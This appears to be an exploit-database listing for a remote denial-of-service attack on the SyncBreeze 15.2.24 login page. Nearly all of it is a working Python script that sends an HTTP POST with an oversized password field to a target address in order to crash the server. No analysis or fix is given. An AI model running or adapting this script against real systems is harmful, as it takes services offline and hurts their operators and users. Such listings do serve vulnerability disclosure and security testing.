SyncBreeze 15.2.24 login Denial of Service

2023.09.09
Credit: mohamed youssef
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: SyncBreeze 15.2.24 -'login' Denial of Service # Date: 30/08/2023 # Exploit Author: mohamed youssef # Vendor Homepage: https://www.syncbreeze.com/ # Software Link: https://www.syncbreeze.com/setups/syncbreeze_setup_v15.4.32.exe # Version: 15.2.24 # Tested on: windows 10 64-bit import socket import time pyload="username=admin&password="+'password='*500+"" request="" request+="POST /login HTTP/1.1\r\n" request+="Host: 192.168.217.135\r\n" request+="User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0\r\n" request+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\r\n" request+="Accept-Language: en-US,en;q=0.5\r\n" request+="Accept-Encoding: gzip, deflate\r\n" request+="Content-Type: application/x-www-form-urlencoded\r\n" request+="Content-Length: "+str(len(pyload))+"\r\n" request+="Origin: http://192.168.217.135\r\n" request+="Connection: keep-alive\r\n" request+="Referer: http://192.168.217.135/login\r\n" request+="Upgrade-Insecure-Requests: 1\r\n" request+="\r\n" request+=pyload print (request) s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("192.168.217.135",80)) s.send(request.encode()) print (s.recv(1024)) s.close() time.sleep(5)


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top